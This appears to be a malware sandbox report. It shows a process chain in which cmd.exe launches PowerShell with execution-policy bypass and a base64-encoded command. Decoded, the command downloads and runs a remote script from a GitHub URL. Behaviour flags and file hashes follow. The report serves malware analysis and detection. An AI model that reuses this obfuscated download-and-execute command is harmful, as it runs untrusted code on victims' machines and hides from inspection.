C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2600
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1344
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
713a6d64f74ddc3d99499db4b2937fb3
SHA195c9d7eacad3b72be12e4f0c6cd65cfa5dae5485
SHA256a9235643840811e773f4cceb5b2442d6ad1c2c859e55872af47cc4f6f9659755
SHA512740a92fe6def23b9a00d4b5600a87e67c1462788a3ca1c11e8795fb988b1f8cec0f0358c495f723a5c2029791e4e832e383423713e08b07d08ea79a0e2785753
-
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
44c17ac6941d3b33d917b0b80073236d
SHA1993a5fed70e30829afd19c60bbe5190c3d394b79
SHA256df46c5e8d4f6141a8720bf9dcd1dc9107caa71d400914dc9d9575abd9514de64
SHA51209184ace2db8726a724b3aea2d428aba6925b49f9c581c55c52cf1fe0ab03e2c2155a453d37fa583dbdb0fe5d4e75dc88cecc198ee5529c3ee816d7911709199
-
MD5
3854df1520f9a49358a103e67b6512b9
SHA1b26ed9b9b305d178f015a7506dbc1a1b75a7a0de
SHA256f35e4a5827169774da31e04283b0ff79a53d3240cc5aa87938765a7bf01ec1c6
SHA5126671106afed3ad76ad645631111ecd0c5abad454d3442a3f24259c5de5a099556c90da373933b78ba6d8194693589c535082d91a074041e9f2105cb0da197a1b
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
1a8d13ae71844a56e2469fe0015fe5c9
SHA1343df155ba8436ae87f01262041a19c229599642
SHA256d61746f9ad7b8fd89ebcb28ce7470098bbf2e458b4dbc87dafd3a2875617aa62
SHA512ba044b5b1b0e5b82020688676f9934f52875ed518e9e48e44258ffd4ad8be5d03f739c42c4c3c002c6a0373e181c0e0a99dad5bab1bd8fc8e419807d1ff31ab3
-
MD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
MD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13